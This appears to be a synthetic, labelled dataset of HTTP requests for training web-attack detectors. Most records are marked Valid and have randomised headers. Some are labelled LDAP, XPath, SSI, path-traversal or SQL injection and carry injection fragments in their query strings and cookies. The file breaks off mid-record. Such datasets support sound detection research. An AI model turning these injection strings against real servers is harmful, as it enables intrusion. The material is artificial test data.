From: ci0lcoo@or8ttw.ch
If-Modified-Since: Thu, 21 Aug 08 18:33:48 UTC
If-Unmodified-Since: Tue, 20 Sep 05 24:54:09 CET
If-Match: "tfG0XH.MBv.gsw1ZFhz"
If-None-Match: *
If-Range: Fri, 19 Jan 07 18:52:43 GMT
Max-Forwards: 49
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 1e5et aieatut=rah4tea
Authorization: NTLM cmRzYXRqb3R5ZmVhdGU5YWRyZkM1aWRyZWFUbWhhd2FSRTYyOWRpdA==
Range: -92,-97
Referer: http://www.flnj3uU.biz/rUwni/aHya4rt5/frem/Tite.gif
TE: chunked,deflate,chunked
Trailer: Trailer
User-Agent: Mozilla/6.4 (compatible; Konqueror/5.4; Linux i586; Cnucn8rtd; l0odesqpcc; 0yUeraWe)
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1238x1114
Via: FTP/3.5 www.rvtIrriP.shtml
Transfer-Encoding: deflate
Upgrade: a1gnfr/1.8, dT1/0.1
Warning: 175 www.sl7Ocpt.jpg:342 "0uw6Ne" "Fri, 08 Feb 08 18:17:21 CET"
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rimvsOdrt=boor$4odaob&eTef=sts /1<andO1i&1iihhUco5hadsol=311&ttazez=iS@M&liwrjh3etw=irochildntmp=8c$3ldeleteo4td@hw&lHSah=a8.4XWuu&eoc8sbazR96d=tajeheae&sooIa8Mltf22gg=03tt4aw3tPqLe3per

End - Id: 32819
Start - Id: 2772
class: Valid
GET /CtVN9RIL1ylocationFHO_/0slVv@jrGkY5C19/zetwstnesstonso4st/saarrtis6origEay/eAeonewthaiswFlcjn/encrewnn/etiioawrnealsdyC8oN.asmx?miVI7hOxA=aumvau&kpu=3210&rltimpeklycv=iHgC1&taoeob9txun=8nq9d9cc2fpb4&_rcpZAz4T9e=+1l+v%7Eerhhitta%3A HTTP/1.1
Host: 220.204.138.146:2
Connection: keep-alive
Accept: video/mpeg;q=0.6, audio/x-wav;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: T3hr-csOniu;q=0.0, mst-geloie1s, 0bwhipf-i3FNh, Nn-stslfkon, it4eSt-Mfih7i;q=0.2
Cache-Control: no-store
Client-ip: 50.180.170.170
Cookie: rhomeW9h3idx=4netcatit
Cookie2: $Version="55"
Date: Wed, 26 Jul 06 15:35:51 CET
ETag: "0_4Ow6kduQ8_8BQzx"
Expect: ud20arnu
From: mjcra@eenaabniO.org
If-Modified-Since: Sat, 30 May 09 02:58:54 UTC
If-Unmodified-Since: Thu, 23 Apr 09 22:23:46 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 744
MIME-Version: 5.1
Pragma: ao4hVd='S4alus'
Proxy-Authorization: Digest realm
Authorization: iwuNiL r7ns5wf=oSjfnr
Range: 771-26
Referer: /eKlt.asmx
TE: chunked,chunked;q=0.5
Trailer: Warning
User-Agent: yeresebtissj0y
UA-CPU: Sparc
UA-Disp: 9580,602,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x004
Via: nsn5/9.7 www.pmumeer.png, pic/2.5 www.r1ti.gif, 2.7 www.3ezirci.htm:2130
Transfer-Encoding: deflate
Upgrade: silEs/6.4
Warning: 433 www.3iZiO.shtml "i0ieOtioafSs" "Thu, 10 Jun 04 22:10:06 CET"
X-Forwarded-For: 33.121.40.254
X-Serial-Number: 82627
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2772
Start - Id: 38672
class: LdapInjection
GET /2ohxouAhbdwc/UJuSl.KqAWygb/l3Ue6C3xmMli-7Sa/oFK93Yo5Wj2LW4/1n8sset/tM-Gfv1N/eLwbUSniy/dqtAipZ9-VwBl3KBuX2/allDYwbykhRAzYI/ol0r3t9ZR/77l5DstyleXLvarDDuX/q.ZVJa.dll?wm=oodoq%29%28%26%28objectClass++++%3D++++qnT*%29&Dl=83sptp49tatim%26tvbscriptu&atleoescrs=j&SustEriiP2er3ll=Eoe HTTP/1.0
Host: www.janf9vgsop.st
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lf-S;q=0.6
Cache-Control: max-stale=3
Client-ip: 202.109.50.24
Cookie: tiiOt7hcr=ee\liwgetm)/tcmtogt;RYo2efhanA=461185629;9l=21277884;nldieiznc==delete7ilriah;t7eaeino=hs
Cookie2: $Version="8"
Date: Mon, 16 Jul 07 07:39:50 UTC
ETag: W/"O9@O-jxY9.LjYLQO"
Expect: eees1
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 19 Feb 06 13:09:34 CET
If-Unmodified-Since: Mon, 01 Jun 09 12:39:01 CET
If-Match: "rkeIlLUNvrgOuws"
If-None-Match: *
If-Range: "b7RlmrqvpRKD2Uvxr2"
Max-Forwards: 4609
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Basic ZTNpZGlzYzp0czFtb2VmYw==
Authorization: Basic ZHVlZTM0aG06ZnM4b2g=
Range: -3789,-5,300-00360
Referer: /ebsoret/0bhr/02tgloey/Denh.php4
TE: deflate
Trailer: Accept
User-Agent: Mozilla/6.0 (compatible; tNi5l; Win98; lyot; Prec8sh)
UA-Disp: 0550,3953,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7709x7356
Via: o1r/1.1 www.nhorlir.htm, FTP/1.2 85.224.226.63
Transfer-Encoding: compress
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 573 www.ieOt9nem.jpg "laN3" "Mon, 22 Aug 05 03:38:37 UTC"
X-Serial-Number: 4169159
----: -------------------

null

End - Id: 38672
Start - Id: 29125
class: Valid
GET /uNInASJO/iVC-n3_WWX4n-Ox4.aspx?hi=io1yyp8ibsl HTTP/1.0
Host: www.doyewo.net
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.5, deflate;q=0.0, gzip
Accept-Language: aog-eneas, isiebfl-tsi7etod, hnlo-oa
Cache-Control: no-transform
Client-ip: 186.234.179.68
Cookie: 3zzeosIaihldmy=nyeh5risigt
Cookie2: $Version="29"
Date: Wed, 08 Apr 09 02:36:57 UTC
ETag: W/"B1-Hq3-tdE.0yKIGBz"
Expect: aegc
From: kri0e@sedyhtw.com
If-Modified-Since: Fri, 06 Jul 07 01:19:56 UTC
If-Unmodified-Since: Thu, 24 Apr 08 11:36:07 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Jan 05 09:16:55 GMT
Max-Forwards: 54
MIME-Version: 3.3
Pragma: h=sOft
Proxy-Authorization: Basic bGhzOGE6dGEyYQ==
Authorization: Digest cnonce="ttbhlht"
Range: 71-
Referer: http://iuAirha.com/uR8nati/eOzn/atil.tiff
TE: deflate;q=0.1
Trailer: User-Agent
User-Agent: szwestts
UA-CPU: MIPS
UA-Disp: 8585,7282,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 466x304
Via: 4.8 90.72.182.133, 7.5 95.232.79.56
Transfer-Encoding: identity
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 307 153.16.182.150 "os9iaUuty" 
X-Forwarded-For: 244.82.254.221
X-Serial-Number: 1881707
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29125
Start - Id: 11217
class: Valid
GET /nPBMcsJQqfV/td1Cf/swkTr/hUF-URjwi/az7_R53Ul1gBTWEQfmG/lTcXstLmetaEPMN8_/e@logSq/h0vGqWa/2G3ufP_q428xo.jpg? HTTP/1.0
Host: 251.80.24.121
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.7
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 191.102.129.160
Cookie: r4a=09u;hdtuais=lP6Pe;ierua0a=Sya;WVt5mqLF=7857645;yk=~cTorneautoexec$um
Cookie2: $Version="2"
Date: Thu, 11 Jan 07 10:50:14 CET
ETag: W/"pKRNQphTAYjN-84"
Expect: 100-continue
From: hPiep@ahrdo9ea.uk
If-Modified-Since: Wed, 08 Oct 08 05:15:21 GMT
If-Unmodified-Since: Fri, 03 Sep 04 16:58:43 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Jan 06 02:34:38 GMT
Max-Forwards: 9
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: isrts ieloau=saeo
Authorization: Basic TnV3bjpwY2xoczh3ZQ==
Range: -62895,1183-7810
Referer: /ettvcs/2gtil3y/Ehtpirl/fwhN.swf
TE: trailers,trailers,trailers
Trailer: From
User-Agent: iV12i4uNW http://www.t0es.org
UA-CPU: StrongARM
UA-Disp: 7122,239,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 1597x0250
Via: 8.0 29.101.249.164
Transfer-Encoding: gzip
Upgrade: ndhD/2.6
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 137.203.184.31
X-Serial-Number: 450563801661696804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11217
Start - Id: 25053
class: Valid
GET /sm1ErU/zoptoi60ABJformfN/eQchVDRPx-whEkZk@E/laEeeEadid/hnb/ejC3Nn/fGC.DwAFa/egeos/oJI21phQ5zRRJ3V.mspx?smEeaf38ayta3=hfnbflsno&2TP-Eu8iMftp=rscripteb&eahd1esf1ae=ia&CwdDZ4SK=Slsgszd8eeunt&shso=slogs&NOtsyie3Pqchnr=trAhirwinntn&Ait8elm=es8osua117ai HTTP/1.1
Host: www.naatry.org
Connection: close
Accept: */*
Accept-Charset: windows-1258;q=0.2, iso-8859-3
Accept-Encoding: identity;q=0.6, compress;q=0.1, gzip;q=0.6, gzip, gzip;q=0.4
Accept-Language: tR-ieodrdcr, Bn-YahaoN8
Cache-Control: max-stale=89718
Client-ip: 75.170.104.171
Cookie: oigx7lwe=M3rcTc4apto
Cookie2: $Version="3"
Date: Sat, 11 Sep 04 07:02:47 GMT
ETag: W/"4Za38LYvU1h@026ySz"
Expect: 100-continue
From: Nett@Mbgoe.fr
If-Modified-Since: Thu, 25 Jun 09 18:48:19 GMT
If-Unmodified-Since: Thu, 15 Jun 06 02:26:44 GMT
If-Match: *
If-None-Match: "1jsrALtijZNvf5F8A1nH"
If-Range: *
Max-Forwards: 86
MIME-Version: 0.1
Pragma: nckcE='Bitost'
Proxy-Authorization: NTLM b3NqaXEydG9qaW13bGVlaWU2cWhpbWlyZGlMaTZ0Z2F0dw==
Authorization: Basic ZndTczpjc3A5
Range: 978-9166
Referer: /fwNs/Bnigz/9e9ra/dhba.php4
TE: deflate;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: 3BD3Jj1 http://www.nrbnn9o.com
UA-CPU: x86
UA-Disp: 562,158,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6866x078
Via: 3.9 17.148.55.42, FTP/1.6 4.138.212.237, ohte/8.6 96.3.134.176
Transfer-Encoding: eslon
Upgrade: TpPo/7.9, mmA/5.5, srAneh/5.3, eag/1.0
Warning: 154 www.tw6sot.shtml "4eodetrlyah" "Tue, 21 Mar 06 01:21:00 CET"
X-Forwarded-For: 6.112.100.122
X-Serial-Number: 21941
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25053
Start - Id: 38241
class: LdapInjection
GET /p%ui5copytBLc/e8_0tN@AwP/t5BNKJszs5IGdoBIjr/wsih1bvhF-KBb2Q7o/Xu@9E.nsf?1TrhsaNyo=rynYesmibi&rselt=geboxktntjna&Aj2vLpositionVQJbgsoundD=ll+ma7l0&Hae6ijtYh=xHVijP9LSak&itehsnaaabuAh=Dri%29%28%26%28objectClass++++%3Dj0b*%29&ctfttdeL=20251579&a3iv=+om3rtvi3%25rtlrwscripto&asvttso2yeAsn=2750&4d=ahNpH2ocwoE6s8v HTTP/1.1
Host: www.C2TOu3fr.uk
Connection: ietco
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 25.111.195.232
Cookie: ehswsshn=9isu4passthru'ad lna=sock_streammp;YKr=msalennltetolrt
Cookie2: $Version="945"
Date: Tue, 20 Dec 05 02:05:20 UTC
ETag: "2UE0tTs01o-b81."
Expect: lereii
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Sat, 01 May 10 19:00:23 CET
If-Unmodified-Since: Tue, 21 Feb 06 20:08:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 861
MIME-Version: 3.3
Pragma: r3Hum7a='ob'
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: Digest realm
Range: -88,49314-030507
Referer: http://www.aiTie8.cz/iqdobntp/inykrrOi/thxpisn/oee3oxlt.gif
TE: trailers,deflate
Trailer: Warning
User-Agent: aBsgeyf http://www.oilsie7r.it
UA-CPU: StrongARM
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 265x803
Via: net/9.6 www.eavn.css
Transfer-Encoding: gzip
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38241
Start - Id: 1237
class: Valid
GET /aqA/dQM7a4i.V-F7OT-i/a1z_59g0-gV/osug.mfQ3nv0z/1Nmo0N/sonOrsyneah8Nigb0fo/_cat/aimnhshgz.jpg? HTTP/1.0
Host: 249.248.58.12
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.3
Accept-Language: mtao-ett0tBd, 4urneF-Etienba;q=0.6, inno6uk-oc8;q=0.5, Tdnzii-r;q=0.9, e-amtc8k;q=0.9
Cache-Control: min-fresh=188
Client-ip: 84.83.204.254
Cookie: sq7eyH9=pfuyutst;fT=t mq
Cookie2: $Version="955"
Date: Sat, 14 Aug 04 10:12:30 CET
ETag: "rMdLeei2EugdD8@C0K"
Expect: 100-continue
From: rrss18n@ElE01poue.cz
If-Modified-Since: Tue, 30 Oct 07 16:22:10 UTC
If-Unmodified-Since: Mon, 02 Apr 07 18:33:00 CET
If-Match: "edr1tf2TvoVnYaHFq2"
If-None-Match: *
If-Range: *
Max-Forwards: 586
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: e4est aOsle=ilenl4i
Range: -709
Referer: /aseewcis/ccaJ.php4
TE: chunked;q=0.9,trailers
Trailer: Transfer-Encoding
User-Agent: qieoiAaclHoamhzdsAo
UA-CPU: PowerPC
UA-Disp: 092,1496,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6040x9780
Via: 1.1 213.115.137.6
Transfer-Encoding: deflate
Upgrade: coiqe/9.7, 2su/5.0, e5rlaa/0.2
Warning: 355 www.oitdunti.shtml "nysuba" 
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 326327
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1237
Start - Id: 46317
class: PathTransversal
GET /scobzUehmetpd/tr6/6cBcWfkRCJ4mCh.shtml?ai=rAnE2pHkoqaP&ion6=ftd-F&ttehi1saae=5t%25eo5%28otmBc&Ernsav=64308910&95rt4blteh=%2F%2C%2C%2C%2Foka9Oo%2Fidrd%2Fpasswd&c9SnufhpweRt27=58371&dssnl8othfe6e=rqt&iitDg=2557231785&ot=b&ic3qshutdownKofromX=nCe&bhnteda=e3%7EMxe5ean%2B+e&nd8da0iltIs=Ogdf0o7C2S&eiu6jMn6lzxnu6w=faxhmimwaDophp&ac5eh=t&ati=%7Cr2irraheih%3AA HTTP/1.0
Host: 129.186.223.196:923
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255;q=0.9, iso-8859-9;q=0.0, x-mac-arabic;q=0.1
Accept-Encoding: *
Accept-Language: h-enyu, es3ca-nisl;q=0.9, Eetu-acjalds;q=0.3, hRhkmi-l9spskig;q=0.2, p5rsn-n;q=0.7
Cache-Control: no-transform
Client-ip: 79.110.171.13
Cookie: oriTku=ec sxt hnrkf;TR1sD=d5n5Wlbw;YCOwDv=rqlib;ey8a=5399609
Cookie2: $Version="20"
Date: Wed, 01 Sep 04 03:47:27 UTC
ETag: "-GzYbTKa0ciTQ3FJ"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Fri, 16 Oct 09 18:45:29 CET
If-Unmodified-Since: Thu, 25 Jun 09 18:35:04 UTC
If-Match: "Qwfa1QdWXZiU4g4U@M"
If-None-Match: "292@xZUTwo8UjlJY_B-1"
If-Range: "k9wIW5Jgkxl@8@S@"
Max-Forwards: 2218
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/hecitr/doeame/jelauc/aesajiHl/e5sikade.cfm
Authorization: NTLM NG9wdHUyYUVvcXRlbjJnc2Flc2FkbmVvYTl0aWFlMWNhbmxCcnk=
Range: 595-7160,98-,4-961
Referer: http://www.tmcea.uk/8idmriin/ikhgdg/alsogzO/hitb.gif
TE: trailers
Trailer: Warning
User-Agent: Mozilla/7.4 (X11; U; Unix 2.8; en-hs; rv:8.1.8) Gecko/74389842
UA-CPU: Sparc
UA-Disp: 0145,4311,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: HTTP/6.6 www.ogoeyiij.tiff, t7aa/3.1 www.maees.png
Transfer-Encoding: ii3ssr
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 4859376671430624
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46317
Start - Id: 12193
class: Valid
GET /H_u38/So5.VoVvVoJy/KapasswdXfrO/etbAaeaucw1thrsrse/einJ/psNlelyrrrsc4isyt.cgi?pe1eineTrqomlhi=08&f1sheceie=ee&aeovseewoEdTeem=sGea&0Dvwtms=the%5D6 HTTP/1.0
Host: www.hon6deoie.de
Connection: keep-alive
Accept: image/*;q=0.1, audio/x-wav;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 8riax-ueelzee;q=0.5, 5-yzN
Cache-Control: max-stale
Client-ip: 225.180.137.20
Cookie: nysnvf4eeyhs=7655927426;wcSeeNG2ouhw=cxqo;Hdvoh5heeir=5764475361;hterbpn=ecehe2sg h>afscriptcdetlt;koff= i%l
Cookie2: $Version="63"
Date: Wed, 20 Aug 08 02:14:13 GMT
ETag: W/"Uo2.SkrvxX_6-3GL"
Expect: 100-continue
From: 3stL@Estri.de
If-Modified-Since: Fri, 09 Nov 07 19:11:16 CET
If-Unmodified-Since: Fri, 06 May 05 14:54:24 CET
If-Match: *
If-None-Match: "JBcXRX1MK-oBr5uzaKp"
If-Range: "EDIRc-oCnsMG4sPRhSDD"
Max-Forwards: 98
MIME-Version: 0.1
Pragma: at2ude=ieeXtf8
Proxy-Authorization: ssrisu Lrlos=esZuwda
Authorization: n7na txmFwoe=renim
Range: -341,81708-966475
Referer: /ttudhi0g/ipJy/nierr/zbeon.tar
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: nrheenaieagmuAez
UA-CPU: x86
UA-Disp: 3158,9578,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 161x2699
Via: 5.3 www.8itsd.html
Transfer-Encoding: e5snt
Upgrade: MaEnwR/5.0, loty/6.5, eisbzi/4.6, Eseen/7.6
Warning: 767 www.marta.htm:66 "aA8r2Eejeo1pede" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 1017195793221995647
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 12193
Start - Id: 29442
class: Valid
GET /Jiorra3sieas7wunnw/hRTphZzwxLP.asp? HTTP/1.1
Host: 253.230.17.40
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: compress, compress, identity;q=0.0
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 15.160.168.158
Cookie: asn10wistgdi4=1tTq>iEo
Cookie2: $Version="346"
Date: Fri, 28 May 04 01:35:10 UTC
ETag: W/"JbuHPG1tQKwlK@IbGuYy"
Expect: e4skeya=nemhrRk;zegybsow
From: hsec4eor@aa5yiaB.org
If-Modified-Since: Wed, 08 Sep 04 17:58:47 UTC
If-Unmodified-Since: Tue, 12 May 09 18:27:42 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 28 May 08 10:56:24 CET
Max-Forwards: 4272
MIME-Version: 1.2
Pragma: olaof5='eo0hc'
Proxy-Authorization: afte feobwab=ieaeeeE
Authorization: Basic cnNzVGVhczo4eGJ0cnJyYQ==
Range: 6527-0267
Referer: /aUOSexm.php3
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/9.2 (X11; U; Linux i586 2.4; M5-9a; rv:3.4.7) Gecko/09156397
UA-CPU: PowerPC
UA-Disp: 206,807,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6889x7208
Via: HTTP/3.9 242.166.248.146, fipze/2.4 209.95.128.49, FTP/1.3 110.8.192.206
Transfer-Encoding: deflate
Upgrade: motr/5.8, tavtH/0.5, 3eeyua/8.2, dC8c/3.4
Warning: 881 224.80.69.65:4958 "uy4Z" 
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 50799275963
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29442
Start - Id: 39338
class: SSI
GET /nTwm7IHz5xIRhJ/BC/pGqNjW4R2Ik/eutuaosrsi.msf?nsnsnae4=%3C%21--%23email+fromhost%3D%22www.rlNzetrd.com%22+tohost%3D%22mailbox.eoe.com%22+message%3D%22neLhoe+9Ee7nd+cu8t2o+i9oevs%22+fromaddress%3D%22tetl.com%22+toaddress%3D%22teu.mNb.com%22+subject%3D%22ew%22+sender%3D%22oocL.com%22+replyto%3D%2202hsla.com%22+cc%3D%22tld%22+inreplyto%3D%22tro0+yUjs+ud%22+id%3D%22ndaemail%22+--%3E HTTP/1.1
Host: 77.87.208.163:077
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8, utf-7;q=0.2, windows-1254, isiri-3342, macintosh;q=0.2
Accept-Encoding: *
Accept-Language: t-kaAgeue;q=0.1, aIenqoh-a;q=0.6, 3-sevD, s1Gtq-bp;q=0.5
Cache-Control: max-age=400
Client-ip: 153.213.53.71
Cookie: LMJ0BN6htpassmV=h"@"n;uotthoe=gensnooSnxtermteE;r6miife=kpd;theaTizCkeyuL=a\metxtr2v;eUjennhm=6;pneentdi7lc=rm\u
Cookie2: $Version="998"
Date: Fri, 19 Mar 10 15:17:23 UTC
ETag: W/"UfE2ce@UXAHx12IVp"
Expect: utbrf
From: tuHdgsLz@bmsemyoDde.biz
If-Modified-Since: Fri, 28 Jul 06 17:30:15 CET
If-Unmodified-Since: Tue, 01 Jul 08 02:42:00 UTC
If-Match: *
If-None-Match: "3mpmfDyxbeeWbZR"
If-Range: Mon, 09 May 05 14:44:23 UTC
Max-Forwards: 519
MIME-Version: 3.0
Pragma: haR1=Rsat
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: NTLM b3RlZWw1dEVlZWVydVJyWWduQ2JhbjJ0Y3JubHJuZXNuZTIx
Range: 422767-,0924-,61697-47592
Referer: /EaNn.sh
TE: deflate;q=0.1,gzip,chunked
Trailer: Connection
User-Agent: Mozilla/6.8 (Windows; U; Windows NT 6.4; sY-9e; rv:5.9.6) Gecko/08679442
UA-CPU: Sparc
UA-Disp: 607,126,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3324x441
Via: 1.9 116.134.112.243, 8.5 114.203.73.248:11, 9.2 www.ortnei.jpg
Transfer-Encoding: compress
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 330 59.99.71.16 "lsngqsttrt0oajgUtrih" "Mon, 05 Mar 07 23:21:49 CET"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39338
Start - Id: 12602
class: Valid
GET /neSoEwtaeiuob8jTt/tn/62ZmMqKf1H1M/e4hvEB82-lvxZU2ent/gucdcpkwnat/BGxG@ImphLUc/acceptsTIi5Bo/nz9J2_g/zPdoQCvM2CzZBdojBO/y7MLFHJYH@ynuZU.mdb? HTTP/1.1
Host: www.hEdlpn71gs.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.5, identity, deflate, compress;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 139.134.8.81
Cookie: nnvsnt=eXky2uDQ@;ui9othwa1oe8wIO=5giwrmIulo;cgtsnz7=Oirul;1dTesryP=vti;vdsden2da=rCOsM
Cookie2: $Version="5"
Date: Mon, 23 Jan 06 11:24:49 UTC
ETag: W/"JhUqncjLNpQbq8uSR"
Expect: aticmne0
From: twlt2b@loijwag.it
If-Modified-Since: Tue, 17 Oct 06 06:13:14 GMT
If-Unmodified-Since: Fri, 01 Apr 05 22:13:09 CET
If-Match: "GpJg_fbs.n9hlbd9DHf"
If-None-Match: "xJgacN9oS6zZe-DDJUa"
If-Range: Wed, 28 Apr 04 21:18:13 UTC
Max-Forwards: 504
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5
Range: 6-190
Referer: http://www.omaha.org/tIomhoaR/eyfeeie/tMhc.swf
TE: trailers,gzip;q=0.8
Trailer: If-Match
User-Agent: Mozilla/3.3 (X11; U; Solaris 0.2; ot-lA; rv:8.0.9) Gecko/06707689
UA-CPU: 68000
UA-Disp: 3446,218,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 280x609
Via: ghkarg/7.0 www.rsTh.gif, 0.5 246.105.223.242:38, FTP/5.0 4.161.11.100
Transfer-Encoding: identity
Upgrade: 3n9/9.5, ido/8.7, mo5iss/2.2
Warning: 763 www.z7ul.css "tssrit" "Wed, 27 Feb 08 20:20:42 CET"
X-Forwarded-For: 75.184.77.165
X-Serial-Number: 16085453
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12602
Start - Id: 49519
class: XPathInjection
GET /yTWdeleteGqARb@E/wTubgsoundY/u-PUoKnZ9.msf?Sciboc0s=wneotir4aAaaewla&ntieqed8nhn=8a4an%2FEd6%2Fk%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D4%5D+or++%27tr%27+++%3D+++%27&r8a=5&asL6iRrg=sa2oumhla+k&rilneWntotur=psfuky%5C%5BpositionN5yecvs&dxh=91345215&Yq30S0psfroml18=hhpyldoT3eit0iecr&e4o0=nN&EB4qadminwVandFf=2834887&l67shuemtdee5=fen%25stmdoeinsertd HTTP/1.1
Host: www.4eNeswWdh.ch
Connection: ns8Nnmoe
Accept: application/postscript;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 173.210.184.6
Cookie: Pk9DYugN68=9dib;5ntr1o0feueiwo=7482192;YEdt4E63=zTm
Cookie2: $Version="29"
Date: Sat, 01 Aug 09 10:02:06 UTC
ETag: W/"64h4ckzIruMjC@Dq"
Expect: 100-continue
From: eaatpaso@ksiwaan.org
If-Modified-Since: Sat, 14 Aug 04 01:37:35 CET
If-Unmodified-Since: Thu, 26 Aug 04 23:07:15 GMT
If-Match: "a3.ksc56FP-hu2Fy"
If-None-Match: *
If-Range: "lt.A2-Ifs@1@LD."
Max-Forwards: 5455
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Digest nc=81065811
Range: 72-,357-,72130-42
Referer: http://iehUA7.uk/e7msohi/cdberOu/wastsO/eiinso/euinyrdu.bin
TE: deflate;q=0.5
Trailer: If-Match
User-Agent: hegrhRve (eEuI4LVXO)
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 7997x438
Via: HTTP/4.1 www.iamhu.png, 5.9 www.telee.css, 1.1 www.nqaientb.html
Transfer-Encoding: compress
Upgrade: 2ao/4.8
Warning: 600 www.plsuhdu5.css "oa6ejaaRibdipelretOe" 
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 4596241823364339
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49519
Start - Id: 41500
class: SqlInjection
POST /emain0n65E/jeNeeetejteertsl/oBXbG/aOenYm4toojI2Td1xrm/on2evprhoatpsxjuud.cgi? HTTP/1.1
Content-Length: 224
Content-Language: 83acAo,pgwId,obZood
Content-Encoding: identity
Content-Location: http://www.eleaha.cz/er2o7tM/yEfa4/ueit4nas.mspx
Content-MD5: bUloTnNvMmVMZHJlcnJ3eA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Jul 09 07:26:25 UTC
